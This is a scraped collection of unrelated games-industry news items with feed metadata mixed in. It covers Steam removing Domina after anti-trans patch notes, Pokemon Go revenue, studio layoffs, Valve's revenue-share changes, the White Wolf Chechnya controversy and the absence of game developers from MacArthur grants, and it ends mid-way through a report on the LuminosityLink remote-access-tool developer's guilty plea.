Valve has removed Roman gladiator sim Domina from Steam after the developer used a recent patch notes post as an opportunity to rant against transgender people and the idea of changing your public gender identity.

Dolphin Barn Interactive’s v 1.3.25 patch notes for the game, published on Wednesday, asks for “respect” as the game changes from its “deadname” of “Domina” to the rebranded “Dominus,” which has supposedly undergone a “sex change.” The thinly veiled post gets more direct as it goes on to demean a well-known trans streamer and asks players to “stop destroying the innocence of children by lying to them about basic biology.”

The Steam store page for Domina says the game is no longer available “at the request of the publisher.” But in a post on a newly created Gab account, Dolphin Barn Interactive’s Nicholas Gorissen said that is “incorrect” and that “Steam cancelled us” over the developer’s views on trans people.

Pokemon Go Niantic net worth: How much is Pokemon Go game developer worth? https://briefnews.eu/pokemon-go-niantic-net-worth-how-much-is-pokemon-go-game-developer-worth/ https://briefnews.eu/pokemon-go-niantic-net-worth-how-much-is-pokemon-go-game-developer-worth/#respond Sat, 05 Jan 2019 05:19:49 +0000 http://briefnews.eu/pokemon-go-niantic-net-worth-how-much-is-pokemon-go-game-developer-worth/

Pokemon Go has enjoyed an incredibly successful 2018 and the game’s popularity shows no signs of slowing.

In addition to critical acclaim, the multiplayer game has earned commercial success, in part thanks to Pokemon Go developer Niantic’s strategy of drip-feeding a steady rollout of fresh content.

So although Pokemon Go is free to download, the aggregate of in-app payments have added up, earning Niantic a fortune in the process.

Pokemon Go reportedly made an estimated £625million ($ 795million) in revenue worldwide last year.

This represents a 35 percent jump in revenue over its first full year.

American players ploughed the most cash into Pokemon Go in 2018, sinking roughly £206 million ($ 262million) in the augmented-reality game over the last 12 months.

And Japanese players were unsurprisingly following close behind, spending approximately £188million ($ 239million).

The amount spent daily in Pokemon Go was also well up over 2018, with Pokemon Go raising an average of about £1.7million ($ 2.2million) per day for Niantic.

And Pokemon Go players also splashed more than £59million ($ 75million) on the game in the month leading up to Christmas.

These amazing numbers are primarily due to Niantic’s strategy of a regular succession of new Pokemon, plus live events and exciting features.

Niantic introduced the Community Days earlier last year, providing players with the paid-for opportunity to catch Pokemon and learn exclusive moves for a limited period each month.

Niantic additionally implemented a whole host of new features in the game.

These included the eagerly-anticipated friends list and trading, while PvP trainer battles – featuring the ability to fight friends in real life – launched only last month.

And the fan-favourite Adventure Sync, tracking distance travelled even when idle, also appeared last year.

Pokemon Go’s latest addition is the Adventure Sync Hatchathon.

The Pokemon Go Adventure Sync Hatchathon is available until January 15 and allow players to earn double the normal amount of Stardust and Candy for hatching Eggs.

The January Community Day is about to take place and will star the Gen 2 starter Totodile.

Niantic’s $ 1million developer contest:

Niantic last December announced the Beyond Reality Developer Contest, promising a prize to win a portion of a $ 1million pool.

Niantic’s contest challenges teams to build “an impactful geospatial AR play experience with the Niantic Real World Platform“.

Application phase sees Niantic will select ten teams with the best technical background, programming proficiency and all-round skills.

And the later Development phase will provide ten team with access to the Niantic Real World Platform.

Finalists will work for a three-month period, with the goal of showing off their incredible work at a Demo Day in San Francisco.

‘H1Z1’ developer Daybreak lays off staff amid restructuring efforts https://briefnews.eu/h1z1-developer-daybreak-lays-off-staff-amid-restructuring-efforts/ https://briefnews.eu/h1z1-developer-daybreak-lays-off-staff-amid-restructuring-efforts/#respond Sun, 09 Dec 2018 10:29:25 +0000 http://briefnews.eu/h1z1-developer-daybreak-lays-off-staff-amid-restructuring-efforts/

Unfortunately, Telltale’s effective closure wasn’t the end of tough times for the game industry. H1Z1 and EverQuest developer Daybreak Game Company has confirmed that it’s laying off staff as it’s “optimizing [its] structure” for the future. The company didn’t say how many people were losing their jobs, but former Daybreak president John Smedley had briefly claimed on Twitter (since absent) that the cuts affected as many as 70 people. There hasn’t been confirmation of this number, and he has since deleted the tweet.

The company rejected assertions that most of the layoffs affected its Austin office, noting that the Texas location was “not closing.”

While there’s no deeper official explanation for the move, Daybreak is in a difficult position. H1Z1 has a sizeable audience (there were 10 million players in the beta a month after launch), but it’s still facing stiff competition from battle royale heavyweights like Fortnite and PUBG. Likewise, massively multiplayer role-playing games like DC Universe Online and the EverQuest series are generally considered past their primes. Combine this with previous layoffs in April and it appears that the company is determined to trim costs while it figures out its next moves.

Microsoft today made a number of developer-oriented announcements that continue its theme of the last few years: the company wants its tools—and ultimately its platforms, especially Azure—to be the choice of every developer, no matter which languages and tools they use and no matter what platform they ultimately deploy on.

The centerpiece of Microsoft’s developer tools remains Visual Studio, and a first preview of its 2019 edition is now available to download. It integrates the awesome Live Share feature first demonstrated last year and expands IntelliCode, a machine-learning-driven extension to the IntelliSense developer assistance that’s been a part of Visual Studio for ages. IntelliCode examines source code repositories to build models of a range of different things, from code formatting preferences to library usage and development patterns.

Currently, IntelliCode works with C# in Visual Studio and Python in Visual Studio Code. It does so by using GitHub’s open source repositories as its training data. Visual Studio 2019 expands this to enable analysis of private repositories. It also increases the language compatibility; Visual Studio will add C++ and XAML support, while Visual Studio Code will pick up JavaScript, TypeScript, and Java support.

Valve changes developer terms to try to retain top games

(credit: Aurich Lawson)

For years, game distribution platforms like Steam, GOG, Apple’s App Store, and major game consoles have generally taken a 30 percent cut of any revenue made from online game sales. Now, Valve is moving to change those terms to be more generous to Steam developers, but only for the absolute biggest games on the service.

In an announcement posted late Friday, Valve said that it would lower its usual 30 percent take to 25 percent for any game’s earnings beyond $ 10 million (including “game packages, DLC, in-game sales, and Community Marketplace game fees”). The platform fee reduces further to 20 percent for earnings that surpass $ 50 million.

“The value of a large network like Steam has many benefits that are contributed to and shared by all the participants,” Valve writes in the announcement. “It’s always been apparent that successful games and their large audiences have a material impact on those network effects so making sure Steam recognizes and continues to be an attractive platform for those games is an important goal for all participants in the network.”

Game developer apologizes, restructures firm after outcry over imaginary anti-gay Chechen vampires https://briefnews.eu/game-developer-apologizes-restructures-firm-after-outcry-over-imaginary-anti-gay-chechen-vampires/ https://briefnews.eu/game-developer-apologizes-restructures-firm-after-outcry-over-imaginary-anti-gay-chechen-vampires/#respond Sat, 17 Nov 2018 22:31:21 +0000 http://briefnews.eu/game-developer-apologizes-restructures-firm-after-outcry-over-imaginary-anti-gay-chechen-vampires/ The developer of ‘Vampires: The Masquerade’ tabletop game will be restructured after complaints about the game’s bizarre plot, in which vampires in Chechnya use the persecution of gay people to cover up their own existence.

The board game features bloodsuckers, who torture and feed on gay people, and wasn’t long in Russia’s Republic of Chechnya when the Swedish White Wolf company announced that sales of the 200-page explanatory ‘setting’ book, which was only just released, will be “temporarily suspended.”

“The section on Chechnya will be removed in both the print and PDF versions,” they pledged, adding that making these changes would take at least three weeks and would lead to delays in shipping of the product.

White Wolf made headlines earlier this week after media learned that their new ‘Vampires: The Masquerade’ orientation book characterized Russia’s Republic of Chechnya as a haven for vampires.

According to the authors, in the game the undead rule the land through a powerful mafia-like structure, while the Kremlin-backed human leader of the republic, called Sultan Ramzan, is merely their puppet. This puppet, a namesake of the current head of Chechnya, Ramzan Kadyrov, is described in the game as the pursuer of a lavish lifestyle who feeds his enemies to predators in his personal zoo.

As for the international outrage over the alleged persecution of homosexuals in Chechnya, it’s actually a sophisticated media campaign to distract attention from the very existence of vampires. But it doesn’t mean that the LGBT community is out of harm’s way in the fictional version of Chechnya, as the undead torture, kill and use them as food.

White Wolf acknowledged that this time their imagination led them to the wrong place, saying that “horror should not be afraid to explore difficult or sensitive topics, but it should never do so without understanding who those topics are about and what it means to them.”

“In the Chechnya chapter… we lost sight of this. The result was a chapter that dealt with a real-world, ongoing tragedy in a crude and disrespectful way,” the statement read.

The developers apologized and said that they should’ve filtered the inappropriate content before the book went to print.

The whole scandal has also led to significant changes to the company itself, with the statement informing that “White Wolf will no longer function as a separate entity,” but is to be restructured as part of publisher Paradox.

It was the second time the game developer found itself in hot water in recent months. White Wolf was also accused of drawing inspiration from neo-Nazi and white-supremacist ideology, but has vigorously denied the claims.

Still waiting for a video game developer to win a Genius Grant https://briefnews.eu/still-waiting-for-a-video-game-developer-to-win-a-genius-grant/ https://briefnews.eu/still-waiting-for-a-video-game-developer-to-win-a-genius-grant/#respond Sat, 20 Oct 2018 15:19:43 +0000 http://briefnews.eu/still-waiting-for-a-video-game-developer-to-win-a-genius-grant/

Every year since 1981, the MacArthur Foundation has handed out the “Genius Grant,” awarding a handful of individuals $ 625,000 each in recognition of their creative skills and success in their chosen field. The money is no-strings-attached, designed to act as an open investment in that person and their work. The chosen Fellows come from an extensive range of industries, from philosophers and filmmakers to journalists and jazz performers. There’s even a basket weaver on the list.

There are absolutely no video game developers.

“The grant program has basically been concurrent with the entire history of video games,” Mohawk Games CEO Soren Johnson said. “It just seems really weird that they basically pretend that video games don’t exist.”

MacArthur Fellows 2018

Johnson, who designed and wrote the AI systems for Civilization 3 and 4, has called out the lack of recognition two years in a row on Twitter, noting the MacArthur Foundation has awarded 1,014 Fellowships over the past 37 years.

“Somehow, a program dedicated to supporting originality, innovation, and CONTEMPORARY WORK has completely excluded the art form that has grown the most — by orders of magnitude — during the program’s existence,” he tweeted in early October. “If the MacArthur Foundation wanted to look for a place where their money would support art with the greatest potential impact on the next generation, they could find no better place than video games.”

However, it’s not that the MacArthur Foundation isn’t looking.

The foundation keeps the Genius Grant nomination process fairly opaque, with a “constantly changing pool of invited external nominators chosen from as broad a range of fields and areas of interest as possible.” The nominees are evaluated by an Independent Selection Committee of 12 leaders in the arts, sciences, humanities, non-profit and commercial industries. This committee then makes its final recommendations to the MacArthur Foundation president and board of directors, who hand out the prizes.

MacArthur Fellows 2018

Game developer and Carnegie Mellon professor Paolo Pedercini was part of this process in 2014. In response to an article about the Genius Grant that year, Pedercini tweeted, “Without further disclosures I can tell you that game designers are being considered for MacArthur fellowships.” He was backed up by John Sharp, an associate professor of games and learning at Parsons, who added, “And have been for about the last 5 years.”

“I’m not part of the fellowship program; I was just asked out of the blue to provide a letter of support for a nominee, which I did,” Pedercini told Engadget this week. “The nominee was a game developer, among other things.”

The MacArthur Foundation declined an interview for this story, though a spokesperson offered the following statement: “Many Fellows work across multiple fields or change fields over time. We are continually striving to cultivate a broad, deep, and diverse pool of nominators and evaluators in order to explore the full breadth of creativity.”

MacArthur Fellows 2018

The MacArthur Foundation isn’t alone in turning a blind eye, at least on a public level, to the video game industry. The Guggenheim Fellowship has been active since 1925, offering grants to people “who have already demonstrated exceptional capacity for productive scholarship or exceptional creative ability in the arts.” Recipients come from a broad range of fields, including film, literature, history, physics, drama and dance. The John Simon Guggenheim Memorial Foundation offers an average of $ 43,000 to each Fellow and it picks roughly 200 winners each year.

There is no “video game” category in the Guggenheim Fellowship search bar (though there is German and Scandinavian Literature, Medieval History, Sound Art, and Constitutional Studies, to name a few categories), and typing in “video game” doesn’t yield any relevant results. In contrast, a search for “film” finds 20 pages of results.

It seems that there’s been just one Guggenheim Fellow who identifies as a video game developer, and she was named this year — Elizabeth LaPensée, creator of eco-focused game Thunderbird Strike and a writer on Where the Water Tastes Like Wine. That’s one out of more than 18,000 Guggenheim Fellows.

Other, less academic, award programs are also reluctant to include video games. For instance, the Grammys have nominated a video game soundtrack or song just twice in 60 years. This is despite a restructuring in 2011 that officially opened the door for video games to be nominated in the Visual Media award category.

It’s crazy to me that game development doesn’t get more recognition in regards to its impact on the world.

Meggan Scavio, AIAS president

“There are so many people in our industry that contribute to pushing the boundaries of art and fun and technology — it’s crazy to me that game development doesn’t get more recognition in regards to its impact on the world,” said Meggan Scavio, president of the Academy of Interactive Arts and Sciences. That’s the non-profit organization behind the annual DICE Awards — essentially the video game Oscars. Founded in 1996, the AIAS is dedicated to supporting video game developers and legitimizing the industry in the mainstream.

“I think the problem is that in some institutions, video games are still seen as entertainment for kids,” Scavio said. “You just sit in front of a TV and shoot stuff, right? But for those paying attention, that’s just not the case. I’m a 48-year-old woman who plays video games every day and I can’t remember the last time I shot anything.” She called out games like Papers Please, This War of Mine and That Dragon, Cancer as examples of the medium’s emotional power.

“While you can certainly read or watch these stories, only video games force you to participate, allowing you to truly feel these hardships,” she said.

That Dragon, Cancer

There’s hope, according to Scavio. A handful of organizations have added video games to their repertoires and the list is growing. GLADD will include video games in its media awards for the first time this year; the Smithsonian’s Lemelson Center recently launched a program to recognize video game pioneers and preserve industry history; the Museum of Modern Art has 14 video games in its permanent collection.

Video games are obviously an art form, imbued with creativity and latent talent. The question, then, is why this popular, massively influential, highly technical, bigger-than-Hollywood creative field isn’t recognized as art, or as something important, by high-profile organizations.

Sure, there are thousands of other industries ignored by the MacArthur and Guggenheim grant programs, though none that are as popular and culturally relevant as video games. In terms of revenue alone, video games outstrip the film industry three-to-one: Games brought in $ 122 billion worldwide last year, while box office sales generated roughly $ 43 billion. There are an estimated 2.3 billion gaming fans around the globe. Fortnite, Minecraft and Overwatch are household names.

Oculus Quest hands-on

Video games are a hotbed of innovation. Developers and players are excited to try new ideas and push the boundaries of immersion and storytelling, and the industry itself is a proving ground for new technologies. Just look at virtual reality. The VR industry established its roots in gaming; it found hungry test subjects in players and enthusiastic tinkerers in developers. From video games, VR has expanded to film, TV, education and advertisement. A similar story is playing out in the world of augmented reality, with experiences like Pokemon Go introducing its basic concepts to the broader market.

Video games themselves are demonstrably powerful, emotional, perspective-shifting experiences covering an infinite range of subjects from just as many varied perspectives. The MacArthur Foundation itself recognizes this truth, offering grants for educational video game projects through efforts including the Digital Media and Learning Competition.

But in 37 years, the MacArthur Fellowship has never recognized the accomplishments of video game developers. This fact isn’t an indictment on the Foundation itself or a devaluation of the people who have received genius grants. It’s simply strange.

MacArthur Fellows 2018

“They even have 3D visual art, which is obviously a very core part of video games,” Johnson said. “So if you look at the sum total of everything they recognize, it’s just super weird that video games are completely missing.”

It’s possible that video games have simply fallen through the cracks built into the MacArthur and Guggenheim nomination systems, with nominators unable to fully convince their peers or the board that developers deserve a nod.

“I can only speculate, but it seems like the Genius fellowships are increasingly awarded to people who are trying to make the world a better place and/or to people from marginalized backgrounds,” Carnegie Mellon professor Pedercini said. “Neither of these characteristics are very common among established game developers. Moreover, I think that the few ‘geniuses’ in our field — people like, say, Stephen Lavelle, Porpentine or Michael Brough — are underappreciated even within the gaming circles. It may just take some time.”

The MacArthur Foundation has had nearly 40 years to find value in the video game industry and it hasn’t happened yet. That doesn’t mean it shouldn’t — or that it never will.

‘Pokémon’ developer is releasing a Switch RPG called ‘Town’ https://briefnews.eu/pokemon-developer-is-releasing-a-switch-rpg-called-town/ https://briefnews.eu/pokemon-developer-is-releasing-a-switch-rpg-called-town/#respond Fri, 14 Sep 2018 02:40:04 +0000 http://briefnews.eu/pokemon-developer-is-releasing-a-switch-rpg-called-town/

Game Freak, the Japanese video game developer behind Pokémon, is working on a turn-based RPG simply called Town. Thankfully, that’s only a working title for the new IP, so they might still come up with something more memorable. Nintendo has announced the game during its latest Direct presentation, showing some of its characters and a short preview of its gameplay. Apparently, the game is a new story set “in a village with a secret to hide.” Under the protection of a castle, the village’s residents enjoyed peace until giant monsters started showing up and wreaking havoc. The villagers now have to team up and fight off the fiends with their smarts and their tools.

As you can see, its aesthetics kinda resemble Fantasy Life and Animal Crossing, but other than what was mentioned during the event, Nintendo hasn’t revealed much else about the game. We’ll likely hear more about it the nearer we get to its release date sometime in 2019.

A Kentucky man has pleaded guilty to federal charges he developed, marketed, and provided technical support for software he knew customers used illegally to take control of other people’s computers.

Colton Grubbs used the handle KFC Watermelon to advertise the LuminosityLink administrative tool on Hackforums[dot]net, federal prosecutors alleged in an indictment filed last month. The indictment said the tool provided a variety of malicious capabilities including the ability for purchasers to control others’ computers, surreptitiously record users’ activities, and to view their files, login credentials, and personal information. The defendant, prosecutors said, also used the hacker forum and a website located at luminosity[dot]link to teach users how to conceal their identities and prevent antivirus programs from detecting the tool.

On Monday, Grubbs signed a plea agreement that admitted that from 2015 to 2017 he designed LuminosityLink and sold it for $ 40 apiece to more than 6,000 individuals, knowing that some of them were using it maliciously. While previously claiming the software was a legitimate tool for system administrators, Monday’s plea agreement admitted he knew some customers were using it to control computers without owners’ knowledge or permission. The document, which was signed by Grubbs, stated:
